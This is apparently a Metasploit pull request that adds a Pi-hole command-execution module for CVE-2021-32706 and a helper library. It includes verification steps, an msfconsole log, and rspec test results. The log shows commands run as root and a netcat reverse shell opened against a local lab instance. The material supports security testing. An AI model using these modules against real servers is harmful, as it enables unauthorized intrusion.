Add pihole cve-2021-32706 and create lib

[h00die]

This PR adds an authenticated RCE to pihole (cve-2021-32706), which is VERY restrictive on what payloads it can run. As such, its an aux module that is a one shot for the command.

Noticing how much repetition there is between all my pihole modules, ive created a lib and spec to clean all that up. Ive re-tested all the modules except pihole_whitelist_exec since its a pain to setup and very old and unlikely to still be used. However, it has the same changes across the other modules.

Verification

• Start docker image
• Start msfconsole
• use auxiliary/admin/http/pihole_domains_api_exec
• set rhosts [ip]
• run
• Verify you get command output
• Document looks good
• rspec runs w/o failures

[space-r7]

Tested the aux module and pihole_dhcp_mac_exec

Modules

msf6 auxiliary(admin/http/pihole_domains_api_exec) > set COMMAND whoami
COMMAND => whoami
msf6 auxiliary(admin/http/pihole_domains_api_exec) > run
[*] Running module against 127.0.0.1

[+] Web Interface Version Detected: 5.3.1
[*] Using token: LsdpU/LyDEaS5fNCuXoh0lUTOdCz42q8LCyOVybQ4uU=
[*] Sending payload request
[*] Forcing gravity pull
[+] root
[*] Auxiliary module execution completed
msf6 > use pihole_dhcp_mac_exec
[*] Using configured payload cmd/unix/reverse_netcat

Matching Modules
================

   #  Name                                    Disclosure Date  Rank  Check  Description
   -  ----                                    ---------------  ----  -----  -----------
   0  exploit/unix/http/pihole_dhcp_mac_exec  2020-03-28       good  Yes    Pi-Hole DHCP MAC OS Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/pihole_dhcp_mac_exec

[*] Using exploit/unix/http/pihole_dhcp_mac_exec
msf6 exploit(unix/http/pihole_dhcp_mac_exec) > set lhost 192.168.140.105
lhost => 192.168.140.105
msf6 exploit(unix/http/pihole_dhcp_mac_exec) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(unix/http/pihole_dhcp_mac_exec) > options

Module options (exploit/unix/http/pihole_dhcp_mac_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        Password for Pi-Hole interface
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-f
                                         ramework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Pi-Hole Website
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.140.105  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(unix/http/pihole_dhcp_mac_exec) > set rport 8080
rport => 8080
msf6 exploit(unix/http/pihole_dhcp_mac_exec) > run

[*] Started reverse TCP handler on 192.168.140.105:4444
[*] Using token: jAWE4YISkYccugizdFxh8+pe/qpDWwu1xqLfjlFPCaU=
[+] System env path exploitable: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[*] Payload MAC will be: 4FF8A18B1DDF
[*] Sending Exploit
[*] Attempting to clean 4C40BDB7B66E from config
[*] Attempting to clean 4FF8A18B1DDF from config
[*] Command shell session 1 opened (192.168.140.105:4444 -> 192.168.140.105:53491 ) at 2022-01-11 17:05:11 -0600


whoami
www-data

Tests

% bundle exec rspec spec/lib/msf/core/exploit/http/pihole_spec.rb
Run options: include {:focus=>true}

All examples were filtered out; ignoring {:focus=>true}

Randomized with seed 56623
Msf::Exploit::Remote::HTTP::Pihole ...............

Top 10 slowest examples (0.13234 seconds, 86.8% of total time):
  Msf::Exploit::Remote::HTTP::Pihole#pihole_versions returns 4.4, 4.3.3, 4.3.1 to version 4.4, 4.3.3, 4.3.1
    0.10718 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:102
  Msf::Exploit::Remote::HTTP::Pihole#pihole_logins returns nil on bad login
    0.00998 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:150
  Msf::Exploit::Remote::HTTP::Pihole#pihole_get_token returns token with slashes
    0.00425 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:206
  Msf::Exploit::Remote::HTTP::Pihole#pihole_get_token returns nil when no token
    0.00203 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:184
  Msf::Exploit::Remote::HTTP::Pihole#pihole_get_token returns token with slashes 3.3 format
    0.00195 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:217
  Msf::Exploit::Remote::HTTP::Pihole#pihole_logins returns cookie on valid login
    0.00154 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:161
  Msf::Exploit::Remote::HTTP::Pihole#pihole_versions vDev (HEAD) as of 4.3
    0.00148 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:124
  Msf::Exploit::Remote::HTTP::Pihole#pihole_versions returns 5.2.2, 5.2.2, 5.3.3 to version 5.2.2, 5.2.2, 5.3.3
    0.00135 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:80
  Msf::Exploit::Remote::HTTP::Pihole#pihole_versions returns nil if page can not be reached
    0.00131 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:37
  Msf::Exploit::Remote::HTTP::Pihole#pihole_get_token returns token without slashes
    0.00127 seconds ./spec/lib/msf/core/exploit/http/pihole_spec.rb:195

Finished in 0.15243 seconds (files took 5.99 seconds to load)
15 examples, 0 failures

[space-r7]

Release Notes

This adds an auxiliary module that executes commands against Pi-Hole versions <= 5.5. This also introduces a Pi-Hole library for common functionality required in exploits against the service.